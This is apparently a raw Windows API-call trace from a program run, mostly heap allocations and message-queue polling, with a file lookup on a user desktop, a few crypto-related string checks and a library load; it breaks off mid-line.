[0210.005] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0210.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0210.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0210.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0210.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0210.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0210.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0210.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.008] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WaYoUsnM2UCIentbe.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af5270, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0xf113eec0, ftLastAccessTime.dwHighDateTime=0x1d5e746, ftLastWriteTime.dwLowDateTime=0xf113eec0, ftLastWriteTime.dwHighDateTime=0x1d5e746, nFileSizeHigh=0x0, nFileSizeLow=0x5963, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="WaYoUsnM2UCIentbe.swf", cAlternateFileName="WAYOUS~1.SWF")) returned 0xa87690 [0210.009] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0210.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0210.010] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0210.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.011] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0210.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.012] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0210.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0210.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0210.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0210.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.013] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0210.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0210.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.059] 